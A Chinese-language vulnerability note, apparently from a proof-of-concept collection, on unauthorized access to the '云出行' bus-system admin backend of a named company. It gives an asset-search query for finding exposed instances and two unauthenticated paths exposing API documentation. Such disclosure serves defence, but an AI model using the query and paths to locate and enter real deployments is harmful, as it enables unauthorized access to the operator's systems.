POC/wpoc/江西云本数字科技有限公司/江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞.md

# 江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞

# 一、漏洞简介
江西云本数字科技有限公司总部设立于英雄城南昌，拥有原江西华兴信息产业科技有限公司的原班团队，拥有10年以上的研发、生产、销售智能化公交电子站牌的公交系统服务经验。江西云本数字科技有限公司云出行后台管理系统未授权访问漏洞。

# 二、影响版本
+ 云出行后台管理系统

# 三、资产测绘
+ hunter`web.body="云出行后台管理系统"`
+ 特征

![1709867048534-9c791fbf-307d-4514-90eb-f3741ebb4f60.png](./img/wM-ryvOuyAthJJh_/1709867048534-9c791fbf-307d-4514-90eb-f3741ebb4f60-236876.png)

# 四、漏洞复现
```plain
/doc/
```

![1709867105816-9f04725c-4813-477f-96e9-1833288e2a63.png](./img/wM-ryvOuyAthJJh_/1709867105816-9f04725c-4813-477f-96e9-1833288e2a63-679337.png)

```plain
/v1/api-docs
```

![1709867173481-02a720bf-9ecc-4855-9e3e-1ad50affe44c.png](./img/wM-ryvOuyAthJJh_/1709867173481-02a720bf-9ecc-4855-9e3e-1ad50affe44c-569884.png)



> 更新: 2024-03-13 23:54:14  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pheadzhwmwz319mg>